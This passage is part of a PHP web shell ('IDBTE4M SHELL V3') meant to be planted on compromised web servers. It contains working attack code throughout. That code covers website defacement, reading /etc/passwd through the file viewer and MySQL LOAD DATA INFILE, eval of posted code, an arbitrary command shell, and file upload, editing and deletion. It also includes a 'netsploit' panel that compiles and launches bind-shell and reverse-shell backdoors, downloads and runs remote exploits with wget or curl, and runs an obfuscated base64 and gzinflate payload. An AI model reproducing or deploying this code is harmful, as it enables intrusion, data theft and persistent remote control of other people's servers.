3157. <td><input type="text" size="60" name="tunisia" placeholder="put your index url here !"></td>
3158. </tr>
3159. <tr>
3160. <td><input type="radio" checked="checked" value="1" name="mode"></td><td>/etc/named.conf</td>
3161.  
3162. <td><input type="radio" value="2" name="mode"></td><td>/etc/passwd</td>
3163.  
3164. <td><input type="submit" name="tunisia_deface" value="Deface"></td>
3165. </tr>
3166. </form>
3167. </center><p>
3168. -=[ IDBTE4M SHELL V3 BY KEFIEX404 ]=-
3169. </body>
3170. </html>
3171. ';
3172. }
3173. ?>
3174. <?php
3175. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
3176. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
3177. if( $_POST['_upl'] == "Upload" ) {
3178. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
3179. else { echo '<br /><br />Not uploaded !!<br><br>'; }
3180.  
3181.  
3182. }
3183. ?>
3184. <?php
3185. if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
3186. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
3187. <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); }
3188. else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea>
3189. <tr><td><input style="width:6%;margin:0px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form>
3190. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
3191. if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){
3192. $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
3193. if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
3194. $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
3195. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>"; if(isset($_GET['db']))
3196. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
3197. if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
3198. $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
3199. $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
3200. $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
3201. $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
3202. $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables);
3203. foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; }
3204. elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array();
3205. $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z']))
3206. $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){
3207. if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
3208. for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){
3209. if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) {
3210. if($rows[$j] == "") $dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
3211. $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?>
3212. <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
3213. <input type="hidden" name="x" value="mysql" />
3214. <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr>
3215. <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
3216. <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
3217. <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
3218. <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form>
3219. <?php }} elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')){ @session_start(); @session_unregister("login"); echo "<meta http-equiv='refresh' content='0; url=?y=".$pwd."' />"; "</div>"; }
3220. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ @eval(gzinflate(base64_decode($jumper))); "</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> ";
3221. if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time());
3222. if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
3223. <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
3224. <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content">
3225. <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
3226. <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']);
3227. $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?>
3228. <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
3229. <table class="tabnet" style="width:320px;padding:0 1px;">
3230. <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr>
3231. <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
3232. <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
3233. <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td>
3234. <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table>
3235. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
3236. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
3237. <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
3238. <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td>
3239. <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP</td>
3240. <td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
3241. <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use">
3242. <option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td>
3243. <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>url</td>
3244. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
3245. <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr>
3246. <tr><td><select size="1" class="inputz" name="pilihan">
3247. <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2">
3248. <input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table>
3249. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
3250. <tr><td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:6%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?>
3251. <center><div class="info">IKI NGONO SHELL MADE IN INDONESIA <span class="gaya"><a href="http://fb.com/idbte4m"></a></span></div>